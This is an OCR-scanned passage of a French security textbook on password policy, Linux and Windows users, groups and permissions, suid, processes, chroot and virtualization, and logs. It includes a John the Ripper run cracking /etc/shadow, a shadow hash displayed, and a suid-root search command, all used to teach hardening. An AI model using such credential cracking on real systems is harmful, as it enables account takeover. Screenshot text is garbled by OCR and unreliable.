root@chronelogy:-# john --wordlist=/usr/share/dict/french /etc/shadow 
oaded 3 password hashes with 3 different salts (FreeBSB MD5 [32/64 X2]) 
écanisme (utilisateur) 

guesses: 1 time: 0:00:00:32 100% c/s: 11196 trying! zygomatiques 
root@chronology:-# I 


oota Édition Affichage Terminal Aide 


Crackage des mots de passe avec John The Ripper 


Il faut donc changer régulièrement son mot de passe. 
Sous Windows 


Pour changer le mot de passe de l'utilisateur jean avec @R3S34u*, ouvrir 
une ligne de commandes, et taper net user jean @R3S34u*. Le système 
répond alors que la commande s'est terminée correctement. 
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Sous GNU/Linux 


Pour changer le mot de passe de l'utilisateur jean, ouvrir une ligne de com- 
mandes et taper passwd jean. Il faut alors saisir deux fois le mot de passe. 


Si vous avez un certain nombre de mots de passe à générer, il existe des 
générateurs respectant les règles énoncées ici comme APG sous GNU/ 
Linux. Pour générer très simplement 20 mots de passe : 

- ouvrir un terminal, 

- saisir apg -n 20. 


Utilisateurs, groupes et permissions sur le système 


Gestion des utilisateurs 


Définition 

Un utilisateur est la représentation virtuelle d'une personne physique, enre- 
gistrée sur l'ordinateur, à laquelle des informations sont associées comme 
ses nom et prénom, adresse et mot de passe. Pour interagir avec le système, 
un utilisateur physique s'authentifie avec son utilisateur virtuel : il saisit 
son identifiant et son mot de passe avant de pouvoir faire quoi que ce soit. 
Les actions sont alors effectuées sous cette identité, et sont limitées par les 
permissions qui lui ont été attribuées. 


Sous GNU/Linux 


Les utilisateurs sont enregistrés dans le fichier /etc/passwd et leur mot de 
passe dans le fichier /etc/shadow. Historiquement, il n'y avait que le 
fichier passwd qui contenait les mots de passe. Mais étant un simple 
fichier texte, les haches étaient donc lisibles par tous, le cassage des mots 
de passe était trivial. Le fichier shadow a donc été créé. Il s'agit d'une copie 
de passwd, incluant les mots de passe. Précisons que seul root possède les 
droits de modification et de lecture sur ce fichier et qu'il est le seul compte 
qui peut agir sur les autres comptes du système. 
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Ces fichiers peuvent directement être modifiés avec un éditeur de texte. 
Cependant des outils simplifient la tâche. 

- Ajouter un utilisateur : useradd ; 

- Modifier un utilisateur : usermod ; 

- Supprimer un utilisateur : userdel. 


Pour la syntaxe, se reporter au manuel des outils : man useradd, man user- 
mod, man userdel depuis un terminal. 


Fichier Édition Affichage Terminal Aide 

raot@chronology:-# cat /etc/passud | grep utilisateur 
utilisateur:x:1001:1601::/home/utilisateur:/bin/sh 
raot@chronology:-# cat /etc/shadow | grep utilisateur 
utilisateur:$1$KmvSuDodtkX5ask5SN, xoaiuqGm9qBD6 : 14469:6:99909:7::: 
root@chronology:-# 


Stockage des comptes utilisateur sous GNU/Linux 
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Sous Windows 


Windows gère ses utilisateurs dans un fichier SAM (Security Account Mana- 
ger). Traditionnellement, les utilisateurs se gèrent de façon graphique via la 
console de gestion du système accessible via la commande 
compmgmt.msc. Il est possible également de gérer les utilisateurs en ligne 
de commandes via la commande net user, très pratique pour les scripts. Se 
reporter à la documentation de Windows pour plus d'informations. 


f ga Gestion de l'ordinateur 
IA Fichier action Affdege Fenêtre 2 
e> 20] 


E Gestion de l'ordinateur Joal Nom i Description 
G i Outils système 12 St Administrateurs Les membres du groupe Administrateurs : 
i a Observateur d'événements Æ Duplcateurs Prend en charge la réplication des fichiers 
Œ al Dessers partagés i | invités Les membres du groupe Invités disposen 
9 Kj unes SR Nc i $ Opérateurs de configuration réseau Les membres de ce groupe peuvent dispe 
Í Crouses |i il Opérateurs de sauvegarde Les membres du groupe Opérateurs de s 
|| Utilisateurs Les membres du groupe Utilisateurs ne pe 


ë & Tiroue et alertes de performance : à 
: 4 Gestionnaire de périphériques i Æ Utilisateurs avec pouvoir Les membres du groupe Utilisateurs avec: 


6 g Stodage | A Utilisateurs du Bureau à distance Les membres de œ groupe disposent des 
i ES) Stockage amovible | 

{+ Gestion des disques 
de Ph Services et applications 


La gestion des utilisateurs sous Windows 


Des utilisateurs spéciaux existent sur les systèmes, sans lien avec une per- 
sonne physique. Il s'agit d'utilisateurs uniquement virtuels permettant de 
cadrer le fonctionnement des programmes, afin d'en limiter les privilèges, 
par sécurité. Par exemple, une ligne de commandes ne leur est pas affectée 
comme à un utilisateur physique. 
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3.2 Gestion des groupes 


Un groupe est une entité qui regroupe des utilisateurs, à laquelle des per- 
missions peuvent être attribuées. Au lieu d'affecter les permissions utilisa- 
teur par utilisateur, les droits sont donnés au groupe, et les utilisateurs 
concernés sont affectés au groupe. 


Affecter les permissions utilisateur par utilisateur est rébarbatif et est sujet 
aux erreurs. En effet, dans le cas de suppressions d'accès à des utilisateurs, 
il ne faut pas en oublier une, sinon la sécurité serait compromise. Les grou- 
pes permettent d'éviter ce genre d'erreurs. 


3.2.1 Sous GNU/Linux 


Les groupes sont gérés dans le fichier texte /etc/group et là aussi des outils 
de gestion sont disponibles. 

- groupadd : ajout d'un groupe ; 

- groupmod : modification d'un groupe ; 

groupdel : suppression d'un groupe ; 

gpasswd : gestion des utilisateurs d'un groupe. 


3.2.2 Sous Windows 


La gestion des groupes s'effectue de la même manière que les utilisateurs, 
via la console de gestion. 


Les permissions doivent être précisément définies car elles garantissent la 
sécurité d'un fichier et de son contenu. Etudions l'affectation des droits sur 
nos deux systèmes. 


3.3 Affectation des permissions 


Une permission est une action autorisée sur une ressource (un fichier). Elles 
sont différentes sous GNU/Linux et Windows. Pour le premier système, il 
s'agit de lire, écrire et exécuter (fichier)/parcourir (dossier). Sous le second, 
la gestion est plus fine, nous trouvons : modification, lecture et exécution, 
affichage du contenu du dossier, lecture, écriture. 


25) Sécurité informatique 
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3.3.1 Sous GNU/Linux 


Sous GNU/Linux, tout est fichier. Un périphérique et un dossier se mani- 
pulent alors comme tels. Un fichier possède un propriétaire et un groupe 
d'appartenance. Le propriétaire est affecté par la commande chown 
(change owner). Le groupe d'appartenance par chgrp (change group). 

- Pour changer le propriétaire : chown pierre fichier.txt 

- Pour changer le groupe : chgrp developpeurs fichier.txt 


Pour faire les deux en une seule fois : chown pierre developpeurs 
fichier.txt 


Les autres permissions se règlent ensuite avec la commande chmod. Il faut 
définir les permissions de trois entités : le propriétaire u, le groupe g et les 
autres o. Les autres correspondent à tout utilisateur n'étant ni le proprié- 
taire et n'appartenant pas au groupe. Chaque entité peut avoir le droit de 
lecture r, d'écriture w et d'exécution/parcours x. Un droit s'ajoute avec et 
se retire avec -. 


Par exemple, pour donner le droit d'écriture au propriétaire : 
chmod u+w fichier.txt 

Autre exemple, pour retirer le droit d'exécution aux autres : 
chmod o-x fichier.txt 


Les modifications sont visibles dans les colonnes 1 (droits), colonnes 3 (uti- 
lisateur) et 4 (group) de la sortie d'un ls -I. 
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rootächronology:-# ls -l Z 

total 96 ® © @ @ Q] ®© @ 

irwxr-xr-x 2 roat root 4095 jun 11 12:46 bin 

ruxr-xr-x 4 root root 4096 jun LL 14:28 boot 

Mrwxruxrwx 1 root root 11 jun 10 17:46 cdrom -> media/cdron 
drwxr-xr-x 18 root root 4428 jun 15 09:25 des 

drwxr-xr-x 3 root root 4096 jun 10 18:15 emn 

Jewxr-xr-x 137 root root 12288 jun 15 11:06 ekg 

druxr-xr-x 4 root root 4096 jun 10 18:16 home 

Rrwxrwxrux 1 root root 30 jun 10 21:18 initrd,.img -> hoot/initrd.img-2.6,29-2-amd64 
panar 14 ropt root 12288 jun 14 14:08 lik 

Lruxrwxrux 1 root root 20 jun 10 18:15 Lih32 -> /emul/ia32- Linux /Lih 


Mrwxruxrwx 1l root root 4 jun 10 17:54 Lib64 -> /Lib 
ryx---... 2 root root 16384 jun 18 17:45 lest+found 
{drwxr-xr-x 3 root root 4096 jun 15 10:58 media 
irwxr-xr-x 3 root root 4096 jun 10 18:18 mnt 
rr- 2 root root 4096 jun 10 17:54 opt 
jr-xr-xr-x 177 root root 0 jun 15 09:21 proc 
druxr-xr-x 14 root root 4096 jun 14 17:02 root 
drwxr-xr-x 2 root root 4096 jun 14 14:06 sbin 
jrwxr-xr-x 2 root poot 4096 sep 16 2008 selinux 
drwxr-xr-x 2 root root 4096 jun 10 17:54 sru 


koiwxr-xr-x 12 root root 0 jun 15 09:21 sys 

druxruxrut 13 root root 4086 jun 15 12:32 [ER 

drwxr-xr-x 11 root root 4096 jun 11 12:34 usr 

ns 14 root root 4096 jun 10 18:58 var 

Lruxrwxiux  Ł root root 27 jun 10 21:18 vnliuuz -> boot/vnlinu2-2,6.29-2-amd54 
root@chronology:-# || 


Affichage des permissions d'un fichier sous GNU/Linux 


3.3.2 Sous Windows 


Si vous ne faites pas partie d'un domaine Windows, il faut tout d'abord 
désactiver le partage simple des fichiers afin d'obtenir l'onglet Sécurité 
dans les propriétés des fichiers et des dossiers. 


a Lancez l'explorateur Windows. 
a Cliquez sur Outils - Options des dossiers - Affichage. 
o Décochez dans la liste, en dernière position, le partage simple. 


Les permissions de Windows sont basées sur les ACL (Access Control List), 
disponibles également sous GNU/Linux mais peu utilisées. Les ACL ont 
l'avantage de pouvoir gérer les permissions pour plusieurs groupes et utili- 
sateurs sur le même objet. 
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Dans la partie haute de l'onglet Sécurité, il suffit d'ajouter un groupe ou 
un utilisateur, puis dans la partie basse de régler ses permissions. 


Propriétés de Document. txt 


[ Hachages | _ 


Noms d'utilisateur ou de groupe : 

| g Administrateur M aérinistrateur) 
€ Administrateur DEN administrateurs) 
ER SYSTEM 


Autorisations Autoriser Refuser 


Contrôle total 
Modification 

Lecture et exécution 
Lecture 

Écriture 

Autorisations spéciales 


Pour définir des autorisations spéciales 


ou des paramètres avancés, cliquez à 
sur Paramètres avancés. | Paramètres avances 


Cesokuns) Bones.) | 4: 


Affichage des permissions d'un fichier sous Windows 
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Élévation des privilèges 


L'utilisation normale d'une machine ne devrait jamais se faire en tant 
qu'administrateur, mais en utilisant un compte utilisateur normal. En effet, 
cela limite les dégâts lorsqu'une attaque réussit. C'est aussi valable pour les 
services (Windows) ou les démons (Linux), puisqu'un service réseau vulné- 
rable, fonctionnant en root, qui aurait été corrompu constitue une catas- 
trophe car l'attaquant obtient les pleins pouvoirs à distance. 


Cependant, certaines tâches nécessitent des privilèges particuliers. Par 
exemple, l'installation d'un logiciel ne peut se faire qu'en tant qu'adminis- 
trateur. Des mécanismes permettent d'exécuter directement un programme 
sous une autre identité, sans devoir se déconnecter de sa session, puis se 
connecter sous une autre. 


Sous GNU/Linux 


RARE RARE 


Pour changer d'identité, il faut utiliser la commande su (Switch User), suivie 
de l'identifiant de l'identité à prendre. Si c'est le root, il n'est pas nécessaire 
de le mentionner. Le mot de passe est alors demandé. 


Pour exécuter une commande, il est possible d'ajouter l'option -c, suivie de 
la commande. 


Sous Windows 


Pour exécuter un processus sous une autre identité, il suffit de maintenir la 
touche [Shift] enfoncée et faire un clic droit sur l'exécutable, de sélection- 
ner Exécuter en tant que et de s'identifier avec l'identité appropriée. 


Le mot de passe administrateur ne peut forcément pas être donné à tous, 
mais ses permissions restent nécessaires. L'exemple le plus courant est pour 
le fichier shadow. Ce fichier n'est en effet lisible et modifiable que par l'ad- 
ministrateur du système. Pourtant, vous pouvez très bien changer 
vous-même votre mot de passe, avec la commande passwd, sans vous 
identifier en tant qu'administrateur. En fait, pendant un très court laps de 
temps (l'écriture du nouveau mot de passe dans le fichier shadow), vous 
êtes administrateur dans ce contexte très restreint : vous ne pouvez rien 
faire d'autre en théorie. 
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Le programme shadow possède en effet une permission spéciale : suid. 
Nous pouvons le constater en effectuant la commande ls -l 
/usr/bin/passwd. Le x du propriétaire pour l'exécution a été remplacé par 
un s, pour suid. Cela signifie que le programme s'exécute sous l'identité du 
propriétaire du fichier, ici en l'occurrence root, sans nécessité 
d'authentification. 


On comprend alors pourquoi seul root peut changer le propriétaire d'un 
fichier. Il serait facile de créer des scripts personnels s'exécutant avec les 
droits administrateurs. 


Par analogie, il existe le sgid pour les groupes. 


Activation du suid et du sgid 


Le suid s'active sur un fichier fichiertxt via la commande chmod u+s 
fichier.txt et le sgid par chmod g+s fichier.txt. 


Les programmes suid sont donc très surveillés, tant du côté des dévelop- 
peurs que de celui des attaquants. En effet, une vulnérabilité compromet 
directement la sécurité du système. 


Comment trouver les scripts suid root 
d'un système GNU/Linux 


Dans une console, saisir la commande suivante : find / -user root -perm 
-4000 -print 


Il suffit alors d'auditer les programmes trouvés, à la recherche d'une faille. 
Il est judicieux de désinstaller les programmes inutiles fournissant des pro- 
grammes suid. En effet, le système court un danger supplémentaire inutile. 
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Les processus 


Un processus est une tâche qui s'exécute sur un processeur. Chaque proces- 
sus est identifié par son PID, Process ID, un entier unique. Le gestionnaire 
des tâches permet de voir l'état des différents processus qui s'exécutent sur 
la machine et d'agir sur ceux-ci. Traditionnellement, sous Windows, il est 
accessible en effectuant [Ctrl][Alt][Suppr], et sous GNU/Linux, on utilise 


la commande ps. 


= Gestionnaire des tâehes de Windows 


Fichier Options Affichage ? 


H 


Nom de l'image 


| EXTERNES 
: WLTRYSVC.EXE 
| explorer.exe 

: svchost.exe 

: svchost.exe 

. svchost.exe 

. svchost.exe 

: lsass,exe 

| services.exe 

: winlogon.exe 

| csrss.exe 

| sistray.exe 

: taskmgr.exe 

` smss.exe 

| SOUNDMAN.EXE 
| Keyhook.exe 

: rundll32.exe 

| WLTRAY.EXE 

| spoolsv.exe 

| System 


| Processus [Performances [Mise enséseau [utéseteurs) 


PID Nom de l'utilisateur Processeur Util, mémoire 


EIM h N 


Processus inactif … 0 SYSTEM 


1 488 Ko 
17 536 Ko 
2884 Ko 
17 564 Ko 
4072 Ko 
3616 Ko 
1 100 Ko 
3 204 Ko 
1 208 Ko 
2 884 Ko 
3 124 Ko 
3 988 Ko 
388 Ko 

3 260 Ko 
2 248 Ko 
3 164Ko 
4 300 Ko 
4444 Ko 
236 Ko 
28 Ko 


[9] Afficher les processus de tous les utilisate rs 


Terminer le processus 


| UC utilisée : 0% | Charge dédiée : 108 Mo / 
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Au lancement, un processus est exécuté avec les droits de l'utilisateur cou- 
rant mais le processus peut élever ses privilèges pour effectuer une tâche 
administrative, ou baisser ses privilèges pour ne conserver que ceux dont il 
a besoin. Cette dernière opération est courante pour les démons sous 
GNU/Linux. En effet, ils doivent démarrer en tant que root pour lire leur 
configuration, pour allouer les ressources nécessaires. Mais fonctionner en 
tant que root serait inutilement dangereux, pour un démon réseau par 
exemple, alors le processus diminue ses privilèges ensuite. En cas de com- 
promission du service, l'attaquant n'aura que des privilèges très limités, 
réduisant ainsi l'impact sur le système. 


Le gestionnaire des tâches permet notamment de vérifier la quantité de 
mémoire et le pourcentage d'utilisation du processeur par chacun des pro- 
cessus. Cela permet de déceler le responsable en cas de comportement sus- 
pect de la machine comme des ralentissements anormaux. 


Le coupable peut alors être terminé. Sous Windows, en sélectionnant le 
processus dans la liste, puis en cliquant sur le bouton Terminer le pro- 
cessus. Sous GNU/Linux, nous utilisons la commande kill suivi du PID. Si 
le processus refuse de s'arrêter, l'ajout de l'option -9 permet de le tuer. Il 
sera alors immédiatement stoppé. 


Espionner des processus sous Windows 


Microsoft met à disposition de petits outils qui permettant d'espionner l'ac- 
tivité des processus. Ils sont disponibles sur la page : 
http://technet.microsoft.com/en-us/sysinternals/bb795533.aspx 


Arrêtons-nous sur FileMon et RegMon, qui permettent respectivement 
d'analyser l'activité des fichiers et l'activité du registre de Windows. Il suffit 
de les exécuter pour découvrir que même au repos, un ordinateur travaille 
un minimum. À l'aide de filtres, il est possible de se concentrer sur un 
processus particulier. 
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EX Registry Monitor - Sysinterna 
File Edit Options Help 


CET 


sinternals.com 


YA 


Time 
19.10545540 
19.10548592 
19.10550690 
19.10552979 
19.11433792 
1911436272 
19.11438560 
1911443710 
19.11446190 
19.11447716 
19.11451149 
1911452866 
19.11454201 


| & El 

Time 

12:52:56 
12:52:56 
12:52:56 
12:53:08 
12:53:08 
12:53:08 
12:53:08 
1253:08 
12:53:08 
12:53:08 
12:53:08 


Ces outils sont puissants, car ils permettent de disséquer les 


E| © 


Result 


SUCCE... 
SUCCE... 
SUCCE,, 
SUCCE... 
SUCCES: 
SUCCE... 
SUCCE... 
SUCCE... 
SUCCE... 
SUCCE... 
SUCCE... 
SUCCE... 


Path 


HKLM\SYSTEM\CURRENTCONTRO... 
HKLM\Hardware\D eviceM ap\Video 
HKLM\Hardware\DeviceM ap\Video\\... 
HKLM\Hardware\DeviceMap\WVideo 
HKLM\Hardware\DeviceMap\ViIDEO 
HKLM\Hardware\DeviceMap\VIDES\... 
HKLM\Hardware\DeviceMap\VIDEO 
HKLM\Hardware\DeviceMapWideo 
HKLM\Hardware\DeviceMap\Video\\... 
HKLM\H ardware\D eviceMap\Video 
HKLM\Hardware\DeviceMap\VIDEO 
HKLM\Hardware\DeviceMap\VIDEOA... 
HKLM\Hardware\DeviceMap\VIDEO 


Request 


ClosekKey 
OpenKey 
QueryValue 
CloseKey 
OpenKey 
Queryalue 
CloseKey 
OpenKey 
QueryValue 
CloseKey 
OpenkKey 
QueryValue 
CloseKey 


Process 

Ed explor... 
Ei explor... 
Ei explor... 
E4 explor... 
Ed explor... 
Ei explor... 
Ed explor... 
Ei explor... 
Bi explor... 
Ed explor... 
Ei explor... 
E3 exgplor... 
Ei explor... 


as- Help 
EST EA 
Request 

OPEN 

QUERY INFORMATION 
CLOSE 

QUERY INFORMATION 
OPEN 

QUERY INFORMATION 
CLOSE 

QUERY INFORMATION 
OPEN 

QUERY INFORMATION 
CLOSE 


Path 


C:\WINDOWS\system32\Msimtf. dl 
C:A\WINDOWS\system32\M simtf. dl 
C:\WINDOWS\system32\M simtf. di 
CA\WINDOWS\system32\Msimtf.dil 
C:A\WINDOWS\system32\Msimtf. dl 
CA\WINDOWS\system32\Msimtf. dll 
C:\WINDOWS\system32\Msimtf. dil 
CAWINDOWS\system32\Msimtf. dll 
CAWINDOWS\system32\Msimtf, dll 
CA\WINDOWS\system32\Msimtf. di 
C:A\WINDOWS\system32\M simtf. dll 


Process 
HX Regmon.e... 


Regmon.e... 
Regmon.e.. 
Regmon.e... 
#% Regmon.e... 
Regmon.e... 
Regmon.e... 
AX Regmon.e 
Regmon.e... 
Regmon.e... 
AX Regmon.e... 


FileMon et RegMon en action 


Other 


Access: Dx. 
"ARegistry\. 


Access: Ox. 
0x3 


Access: Dx. 
"N Registry\. 


Access: Dx. 
0x3 


SUCCE... 


opérations 


d'entrées-sorties des processus, à la recherche d'actions suspectes. 
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Les appels de procédures distantes 


Les appels de procédures distantes ou RPC (Remote Procedure Call) permet- 
tent d'exécuter des procédures à distance avec un serveur d'application. Ils 
permettent notamment aux applications l'employant de ne pas se soucier 
de l'implémentation du transfert en réseau, ce système s'en charge. 


Sous Windows, ses nombreuses failles ont fait coulé beaucoup d'encre. En 
août 20083, le ver blaster paralysa des milliers de machines par une attaque 
de déni de service. Le 30 avril 2004, c'était le ver sasser. Un ordinateur 
infecté téléchargeait un programme qu'il exécutait automatiquement à l'in- 
su de l'utilisateur. Ce programme se propageait ensuite par les réseaux 
accessibles par la machine, puis la redémarrait sans cesse. 


Ceci aurait pu être évité si les pare-feu des machines étaient, par défaut, 
correctement configurés et la gestion des utilisateurs mieux faite : Win- 
dows XP forçait la mise en place d'un mot de passe pour le compte admi- 
nistrateur à l'installation, et ne faisait pas tourner ses services sous cette 
identité. 

Retenons qu'il ne faut laisser en fonctionnement sur une machine que le 
strict minimum, avec des privilèges adéquats. 


SeLinux et AppArmor 


SeLinux et AppArmor sont des logiciels de sécurité pour GNU/Linux qui 
permettent de définir sur les applications des politiques de contrôle d'accès 
aux ressources très fines : le strict minimum est accordé. 


Ces méthodes sont lourdes à mettre en place et à maintenir. Elles restent 
peu utilisées, au profit de la virtualisation, mais il peut être intéressant de 
s'y attarder. 
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La virtualisation 


La virtualisation peut se définir comme un ensemble de techniques maté- 
rielles ou logicielles qui permettent à plusieurs applications de fonctionner 
sur une seule machine, séparément les unes des autres, comme si elles fonc- 
tionnaient sur des machines physiques distinctes. 


En terme de sécurité, cette solution semble optimale, puisque chaque ser- 
vice peut être compartimenté. En cas d'attaque réussie, cette isolation 
garantit la sécurité des autres services. 


Il existe de nombreuses solutions de virtualisation. Le but ici n'est pas d'en 
faire un catalogue. Nous allons détailler les différents types de solutions. 


L'isolation 


Un isolateur est un logiciel qui isole une application dans un contexte 
d'exécution. Cette solution est très performante car la surcharge de gestion 
est minime, mais l'isolation reste partielle. Nous allons illustrer cette situa- 
tion avec le chroot, mais faisons d'abord une présentation de l'arborescence 
du système de fichiers de GNU/Linux. 


Sous Windows, une lettre est associée à chaque partition, afin d'y accéder. 

Sous GNU/Linux, l'ensemble des partitions est rattaché à une arborescence 

unique. La racine de cette dernière est /, qui correspond physiquement à la 

partition sur laquelle est installé le système. Cette arborescence est très hié- 

rarchisée, rappellons-nous que tout se manipule par des fichiers : 

- Les périphériques sont regroupés dans /dev, 

- Les informations du système dans /proc et /sys, 

Les fichiers de configuration globale dans /etc, 

- Les fichiers nécessaires au démarrage dans /boot, 

- Les programmes systèmes dans /bin, 

- Les programmes systèmes réservés à l'administrateur dans /sbin, 

- Le répertoire personnel de l'administrateur dans /root, 

- Les répertoires personnels des utilisateurs dans /home, 

- Les programmes utilisateurs dans la sous-arborescence /usr, qui reprend 
des types d'entrées de la racine. 
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L'ensemble du système peut fonctionner sur une seule partition, mais de 
manière tout à fait transparente. À l'installation, il est possible de définir 
qu'une partie de cette arborescence sera située sur une autre partition. C'est 
la notion de point de montage. Par exemple, si nous souhaitons que nos 
répertoires personnels soient localisés sur une autre partition, nous mon- 
tons ladite partition sur /home. 


Ainsi les disques montés ponctuellement et manuellement, pour faire un 
transfert par exemple, sont montés dans /mnt. Le système peut gérer cela 
automatiquement, mais effectuera les montages dans /media. 


Les points de montage fixes se définissent dans le fichier /etc/fstab et les 
montages sont effectués avec la commande mount. Nous n'irons pas plus 
loin dans les détails, l'administration GNU/Linux n'est pas notre but. 


Le changement de racine ou chrooting 


Le but est de substituer la racine du système par un autre chemin pour un 
processus donné. Dès que l'exécution aura débuté, le processus pensera que 
la racine est ce chemin et ne pourra théoriquement pas remonter dans l'ar- 
borescence. Ceci est très pratique pour sécuriser un service. 


Exemple avec le serveur ftp, ftpd : chroot /prison /usr/bin/ftpd 


Même si le service est vulnérable et a été exploité par un attaquant, ce der- 
nier se retrouve coincé dans /prison. Il ne peut donc pas accéder aux don- 
nées de /etc par exemple. 


Malheureusement, dans certains cas, il est possible de sortir du chroot. Par 
exemple, si le programme chrooté a les privilèges pour monter des disques, 
la vraie racine peut être remontée dans l'environnement protégé. La protec- 
tion ne tient donc plus. 


Pour des services vraiment critiques, il peut alors être plus judicieux de se 
tourner vers une virtualisation plus complète. 
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Noyau en espace utilisateur 


Le noyau est le cœur du système. C'est un logiciel critique du système d'ex- 
ploitation qui gère les ressources de l'ordinateur et permet aux différents 
composants matériels et logiciels de communiquer entre eux. 


Un programme fonctionne soit dans l'espace noyau, soit dans l'espace utili- 
sateur. L'espace utilisateur laisse le droit à l'erreur et possède des mécanis- 
mes de protection : chaque application a l'illusion d'avoir accès à l'intégrali- 
té d'une mémoire infinie. C'est l'opposé en espace noyau, une erreur est 
alors généralement fatale. 


Un noyau en espace utilisateur fonctionne donc comme n'importe quel 
autre programme. Il en résulte des performances très faibles, puisque les 
noyaux sont empilés. L'avantage réel est que l'utilisateur root du noyau in- 
vité n'est pas le même que celui du noyau hôte. 


La virtualisation n'est donc pas totale. Cette solution est surtout utilisée 
pour le développement. En effet, débugguer un noyau est très difficile, 
mais vu qu'ici il fonctionne comme un programme normal, les outils stan- 
dards peuvent être employés et il n'est pas nécessaire de redémarrrer la ma- 
chine. User Mode Linux implémente cette solution. 


La machine virtuelle 


La machine virtuelle émule un environnement matériel complet. Le sys- 
tème d'exploitation invité croit dialoguer directement avec le matériel. 
L'isolation est donc totale et il est possible de faire fonctionner n'importe 
quel système d'exploitation à l'intérieur d'un autre, sans modification, mais 
les performances sont très faibles par rapport aux autres solutions, puisque 
tout est effectué en logiciel. VirtualBox, par exemple, implémente ce sché- 
ma. Cette solution était la meilleure, avant la démocratisation de la 
paravirtualisation. 
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8.5 La paravirtualisation 


La paravirtualisation reprend des principes de la machine virtuelle et du 
noyau en mode utilisateur. Le matériel réel est utilisé et l'hyperviseur un 
noyau hôte allégé et optimisé, fait fonctionner des noyaux de systèmes 
d'exploitation invités spécifiquement modifiés. Les systèmes d'exploitation 
invités ont donc ici conscience de fonctionner en environnement virtualisé. 
Cette technique permet d'avoir de bonnes performances, une isolation 
complète, mais ne permet pas de virtualiser n'importe quel système 
d'exploitation, puisque celui-ci doit la prendre en charge. 


Remarque 


Il existe des hyperviseurs matériels coûteux. 


8.6 Exemple de solution de paravirtualisation : Proxmox VE 


Fin AE N Qt z 
65 ~ E hitpes//192.168.100.150/enist/raden him 


V4 4 | Pronox Virtual Environment 


WWW.PrOXMOX.COM 


Machines virtuelles f 


+ Machines virtuefes f k 3 
{Lister | Créer | Migrer 


+ Modèles d'Appfance 


Running Maintainance Tasks 
ien à afficher 

+ Système sé 

+ Sauvegarde 


Cluster Node Ymmaster 


Staun Hom Upöme 
running 2 Mirtes 
+ Serveur running 2 Minutes 
+ Notations rurvéng 2 Minutes 
+ duster 
running 2 Minutes 
nmng 2 Mites 
running 1 Minute 
running 1 Minute 
running 1 Minute 
runing 1 Minute 
running 1 Mnute 
nming 1 Miwte 


L'interface Web d'administration de Proxmox VE 
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Proxmox VE est une solution libre, clés en main, de paravirtualisation. Un 
cd d'installation est disponible sur leur site. L'installation est automatisée 
et très simple. Une interface Web d'administration permet de gérer les 
machines virtuelles et prend aussi en charge la gestion de clusters de ma- 
chines virtuelles. Il est alors possible de gérer les machines de tout un parc 
depuis la même interface et de les faire migrer entre machines physiques. 


L'inconvénient de cette solution est que les disques durs des machines invi- 
tées ne sont pas des conteneurs. Ils correspondent simplement à des points 
de montage dans l'arborescence de la machine hôte. Cette dernière est donc 
la clé de voûte de l'infrastructure. Si elle est corrompue, l'attaquant a accès 
aux fichiers de toutes les machines invitées. La solution est donc de n'auto- 
riser que les services distants indispensables, de suffisamment les sécuriser, 
et de bien limiter l'accès à l'interface Web (bon mot de passe, paire de clés 
privée-publique...). 


La virtualisation permet donc de bien limiter les risques. Cependant, il ne 
faut pas devenir paranoïaque, et tout virtualiser. Il s'agit de bien doser le 
risque associé à chaque service, car la gestion s'en trouve compliquée et 
peut provoquer l'effet inverse. En effet, au lieu de gérer la sécurité d'une 
seule machine, c'est celle de plusieurs, avec tous les dangers que nous avons 
étudiés jusqu'à présent. De plus, l'usage des machines virtuelles est syno- 
nyme de partage de ressources, et ces dernières ne sont pas illimitées. L'in- 
vestissement dans des machines physiques peut être plus efficace que la 
surcharge d'une seule et il est de fait, plus facile de réussir une attaque par 
déni de service sur une plate-forme aux ressources fortement partagées. 


La vigilance, une bonne politique de mise à jour et de sauvegarde restent 
vos meilleurs alliés. 


Les logs, les mises à jour et la sauvegarde 


La sécurité d'un système ne doit pas s'arrêter à la mise en place des divers 
conseils que nous avons pu étudier. Elle s'effectue tous les jours, par la véri- 
fication de la santé du système, afin d'agir dès les premiers signes annon- 
ceurs d'une faiblesse, surtout en environnement de production. 
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9.1 Les logs 


Les logs sont les fichiers journaux des différents services s'exécutant sur le 
système. Ils sont très utiles pour régler des problèmes lorsqu'un service 
refuse de se lancer, mais aussi pour constater les attaques comme par 
exemple un grand nombre d'essais infructueux pour se connecter en tant 
qu'administrateur. 


Sous GNU/Linux, ils sont classés par service, dans des fichiers textes, dans 
/var/log. Les messages du système sont aussi consultables en console via la 
commande dmesg. 


Sous Windows, ils se trouvent dans l'observateur d'événements, situé dans 
les outils d'administration, et sont rangés par catégories et par niveau 
d'importance. 


Bosrvatu dé ieres 
Bhie Action Affpge 2 
en #(9ER223 BE 


LA Observateur d'événements fora) E: 


[I] Apgkcaten ns — 3 
Fi] Séané Type Dat 4 
À srstère | Dinforations 14/06/2009 15:14:14  Serce ControMenager 
(ii internet Explorer Dinformations 1406/309 15:14:06  Serncz Centro Manager 
Dinformatons 1466/209 156241 Service ContdlMansger 
14/06/2009 15:02:41 Serie ConrolMansge 
1406/2009 150241 Serice ConTolHanager 
34/06/2009 150241 Serie Cento Manager 
1406/2509 15:02:41 Service Conto Manager 
14/06/2309 15:02:41 Sar vies Cony Manage 
14/06/2009 15:02:41 Service Conrad Manager 
14/06/2009 15:02:55 eventeg 
1406/2009 15:00:55 eventos 
1486/2209 15:00:26 events 
14/06/2009  15:0018  SerieCorrolMansge 4 
Er 14/06/2089 14:58:52  WiZTme 
| Dinéorations 14/06/2009 125845 Sersce Con'rot Manace 
Dinformatons MARINO) 12:58:45 Service Control Manase 
i 1406/2909 12:58:45 Savice Conyd Manage 
14/06/2003 12:58:45 Service Cony ol Marage 
13/05/20 12:88:45 Seryke ConTol Manager 
14/06/2009 12:58:45 Serie Control Manage 
1R6/NO 1258:45  Seriæ Conyol Marone 
14/06)2009 125845 Service Conrol Manage à 
1405/2009 12:58:45 SericeCony ol Manager 
14/06/2009 12:58:45 Serce Con'rol Manager 
14/06/2009 12:58:33 TPP 
14R6/X09 12:5710  srservice 
1426/2009 12:57:00  eventog 


L'observateur d'événements de Windows 


Un attaquant cherchera toujours à effacer ses traces. Des fichiers vides doi- 
vent donc vous sembler suspects. 
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9.2 Les mises à jour 


Mettre à jour son système est indispensable. Le laps de temps entre la révé- 
lation d'une faille de sécurité, la publication du correctif et son application 
est critique. Il est donc sage de s'abonner aux listes de diffusion concernant 
la sécurité des logiciels utilisés. Vous serez alors informés sur les failles pré- 
sentes et leurs correctifs. Et si le correctif n'est pas disponible immédiate- 
ment, avec le descriptif de la faille, vous pourrez prendre les mesures de 
protection temporaires adéquates. Les mises à jour automatiques permet- 
tent d'écourter le délai entre la publication et l'application des correctifs, de 
